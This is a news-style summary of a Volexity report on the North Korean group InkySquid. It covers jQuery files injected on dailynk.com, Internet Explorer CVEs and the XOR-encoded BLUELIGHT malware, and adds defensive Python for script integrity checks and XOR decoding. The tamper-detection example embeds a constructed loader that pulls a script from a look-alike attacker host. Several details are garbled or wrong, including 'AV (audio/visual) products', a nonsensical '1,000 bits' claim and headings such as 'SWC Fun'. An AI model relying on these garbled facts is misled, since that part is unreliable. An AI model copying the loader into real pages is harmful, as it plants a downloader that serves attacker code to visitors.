A North Korean hacker group has developed custom malware delivered through browser exploits.


The cybersecurity firm Volexity has reported on a recent hacking campaign in which a North Korean hacker group deployed custom malware by exploiting browser bugs.


The attack was launched by a well-known North Korean hacking outfit, which is believed to have used browser exploits to infect a limited number of victims with proprietary malware.


The threat group behind this attack was dubbed InkySquid (not an official alias). Since 2020 it has used Internet Explorer exploits to deliver obfuscated JavaScript code in targeted attacks against the browser.


SWC Fun

In April 2021, Volexity researchers determined that malicious code was being distributed through www.dailynk[.]com, which loaded content from subdomains of the jQuery[.]services domain that were under the attackers' control.


Two URLs on the site were found to be serving the injected code:


hxxps:/www.dailynk[.]com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1

hxxps:/www.dailynk[.]com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2

The threat actors' attacks often involved short-lived, one-time-use code that was removed as soon as it had served its purpose.


According to the researchers' analysis, the activity was difficult to characterize because the malicious code was buried in a large amount of surrounding content.
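The compromise described above works by serving a modified copy of a legitimate library file (jquery.min.js) that pulls in code from an attacker-controlled host. A site owner or defender can catch that with two simple checks: compare the served file against a pinned known-good digest, and flag any script that references a host outside an allowlist. The example below is added here and is not Volexity's or the site's code; the jQuery snippets, the pinned digest and the hostname cdn.jquery.services are constructed for illustration.

```python
import hashlib
import re

# Constructed sample of a legitimate jquery.min.js header (truncated) with a
# source-map reference to the library's own CDN.
CLEAN_JQUERY = (
    "/*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */\n"
    "!function(e,t){/* ...library body elided in this sample... */}(window);\n"
    "//# sourceMappingURL=https://code.jquery.com/jquery-3.5.1.min.map\n"
)

# Constructed sample of a tampered copy: the real library plus an appended loader
# that fetches a second-stage script from a look-alike host (a made-up subdomain).
TAMPERED_JQUERY = CLEAN_JQUERY + (
    ";(function(){var s=document.createElement('script');"
    "s.src='https://cdn.jquery.services/x.js';document.head.appendChild(s);})();\n"
)

# Digest pinned at deployment time; here computed from the constructed clean sample.
KNOWN_GOOD_SHA256 = hashlib.sha256(CLEAN_JQUERY.encode()).hexdigest()

# Hosts a first-party script on this site is allowed to reference (assumed allowlist).
ALLOWED_HOSTS = {"www.dailynk.com", "code.jquery.com", "jquery.org"}

URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")


def integrity_ok(content: str, expected_sha256: str) -> bool:
    """True when the served file matches the pinned digest byte-for-byte."""
    return hashlib.sha256(content.encode()).hexdigest() == expected_sha256


def foreign_hosts(content: str, allowed: set) -> list:
    """Hostnames referenced by absolute URLs in the script that are not allowlisted."""
    hosts = {m.group(1).lower() for m in URL_RE.finditer(content)}
    return sorted(h for h in hosts if h not in allowed)


def audit_script(content: str, expected_sha256: str, allowed=ALLOWED_HOSTS) -> dict:
    """Combine both checks; either failing is a reason to investigate the file."""
    return {
        "integrity_ok": integrity_ok(content, expected_sha256),
        "foreign_hosts": foreign_hosts(content, allowed),
    }


if __name__ == "__main__":
    print("clean:   ", audit_script(CLEAN_JQUERY, KNOWN_GOOD_SHA256))
    print("tampered:", audit_script(TAMPERED_JQUERY, KNOWN_GOOD_SHA256))
```

The digest check alone is enough to detect the modification; the host scan is there because attackers who rotate short-lived code (as described above) will change the file's hash anyway, and naming the unexpected host tells the responder where the second stage was served from. In production the digest would be pinned from a trusted build rather than computed from the file under test, and the same idea can be enforced in the browser with Subresource Integrity attributes on the script tag.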


CVE-2020-1380 (CVSS score: 7.5): scripting engine memory corruption vulnerability

The first malicious code identified was found to use CVE-2020-1380, an exploit for Internet Explorer.


CVE-2021-26411 (CVSS score: 8.8): Internet Explorer memory corruption vulnerability

This CVE had previously been used in exploits affecting both Internet Explorer and Microsoft Edge. In this campaign the redirect code was modified in a way analogous to how it was inserted for CVE-2020-1380.


subdirectory names

The names of the subdirectories used by the hackers are listed below:


logo, normal, background, theme, round

data collection

The threat actors collected the following data from infected systems:


Internet IP address

Local IP address of the default interface

Local time

Regardless of the binary size of the implant, the latter can always hold 1,000 bits.

Process SID authorization level

uniform input processing

A list of all AV (audio/visual) products installed

Whether the infected workstation has VM tools running

In a number of these attacks, the threat actors delivered a new malware family hosted on a separate subdomain of jquery[.]services.


The researchers stated that the file titled “history” is an XOR-encoded (0xCF) copy of a proprietary malware family, which Volexity named BLUELIGHT.
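A single-byte XOR layer like the one on the “history” file is cheap for an analyst to strip, and when the plaintext is a Windows executable the key does not even need to be known in advance: the first two bytes of a PE file are always "MZ", so XORing the encoded bytes against "MZ" recovers the key if both positions agree. The example below is added here and is not Volexity's tooling; the key 0xCF is the value the researchers reported, while the sample executable is a constructed stub (an MZ header pointing at a PE signature), not the real BLUELIGHT binary.

```python
import struct
from typing import Optional

XOR_KEY = 0xCF  # single-byte key reported for the "history" file


def xor_single_byte(data: bytes, key: int) -> bytes:
    """XOR every byte with one key byte; the same call encodes and decodes."""
    return bytes(b ^ key for b in data)


def recover_key_from_mz(data: bytes) -> Optional[int]:
    """Derive a single-byte XOR key on the assumption that the plaintext starts with
    the DOS header magic b'MZ'. Both positions must yield the same key byte,
    otherwise the assumption (or the single-byte scheme) does not hold."""
    if len(data) < 2:
        return None
    k0 = data[0] ^ ord("M")
    k1 = data[1] ^ ord("Z")
    return k0 if k0 == k1 else None


def looks_like_pe(data: bytes) -> bool:
    """Minimal PE sanity check: MZ magic and an e_lfanew that points at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 4 > len(data):
        return False
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def build_fake_pe() -> bytes:
    """Constructed stand-in for an executable: a 64-byte DOS header whose e_lfanew
    field (offset 0x3C) points at a PE signature, followed by some padding."""
    header = bytearray(b"MZ" + b"\0" * 0x3E)
    struct.pack_into("<I", header, 0x3C, 0x40)
    return bytes(header) + b"PE\0\0" + b"\0" * 20


def decode_history_file(blob: bytes) -> Optional[bytes]:
    """Recover the key from the MZ magic, decode, and return the plaintext only if
    it passes the PE check; anything else returns None rather than a false hit."""
    key = recover_key_from_mz(blob)
    if key is None:
        return None
    plain = xor_single_byte(blob, key)
    return plain if looks_like_pe(plain) else None


if __name__ == "__main__":
    encoded = xor_single_byte(build_fake_pe(), XOR_KEY)  # what the dropped file would look like
    print("recovered key: 0x%02X" % recover_key_from_mz(encoded))
    print("decoded is PE:", decode_history_file(encoded) is not None)
```

The PE check after decoding is what makes this safe to run over arbitrary dropped files: a random blob whose first two bytes happen to agree on a key would otherwise be reported as decoded. The same approach generalizes to any known-plaintext prefix (a ZIP's "PK", an ELF's "\x7fELF"), which is how an analyst triages an XOR-wrapped payload before reaching for a full decoder.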


BLUELIGHT was typically used as a secondary payload following a successful Cobalt Strike deployment, though in some instances it was used as the initial payload.


BLUELIGHT communicates primarily through the Microsoft Graph API for Microsoft 365, Office, and other services. Volexity's analysis attributes the recent attacks to InkySquid, which it associates with the North Korean threat group known as ScarCruft or APT37.


The researchers are continuing to study this attack and how it was carried out in order to defend against future attempts of this type.
